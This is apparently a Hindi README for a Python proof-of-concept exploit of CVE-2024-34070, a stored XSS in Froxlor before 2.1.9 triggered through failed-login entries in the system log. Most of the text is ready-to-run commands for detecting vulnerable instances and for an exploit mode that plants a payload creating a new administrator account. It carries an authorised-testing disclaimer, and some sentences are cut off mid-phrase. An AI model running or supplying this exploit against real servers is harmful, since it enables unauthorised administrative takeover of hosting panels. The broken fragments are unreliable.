
CVE-2024-34070 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Froxlor में एक संग्रहीत XSS है। असुरक्षित इंस्टेंस का पता लगाता है, संस्करण निकालता है, और एक व्यवस्थापक खाता बनाने के लिए पेलोड इंजेक्ट करता है।
CVE-2024-34070 के लिए Python प्रूफ ऑफ कॉन्सेप्ट, जो Froxlor 2.1.9 से पहले के संस्करणों में स्टोर्ड XSS समस्या है, जो सिस्टम लॉग में लिखे गए असफल लॉगिन प्रयासों के माध्यम से होती है।
यह परियोजना केवल अधिकृत सुरक्षा परीक्षण, CTF लैब्स और शैक्षिक उपयोग के लिए है। इसे उन सिस्टमों पर न चलाएं जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। एक्सप्लॉइट मोड लक्ष्य Froxlor इंस्टेंस पर एक व्यवस्थापक खाता बना सकता है।
< 2.1.9)।अप्रमाणित पहचान:
python3 main.py --url http://240.0.0.1:8080 --check
प्रमाणित पहचान, सटीक Froxlor संस्करण प्राप्त करने के लिए उपयोग किया जाता है:
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
एक्सप्लॉइट मोड, एक नया व्यवस्थापक बनाना:
python3 main.py --url http://240.0.0.1:8080 --exploit \
--new-admin abcd \
--new-password 'Abcd@@1234' \
--new-email [email protected]
यदि कोई व्यवस्थापक या ऑटोमेशन बॉट Froxlor सिस्टम लॉग पढ़ता है, तो सत्यापन चरण अंततः admin_index.php पर रीडायरेक्ट हो जाना चाहिए।
--check Froxlor की पुष्टि कर सकता है लेकिन कड़ाई से असुरक्षितता निर्धारित नहीं कर सकता।/admin_admins.php) का उपयोग करता है ताकि यह हार्ड-कोडेड डोमेन के बजाय लक्ष्य इंस्टेंस के विरुद्ध काम करे।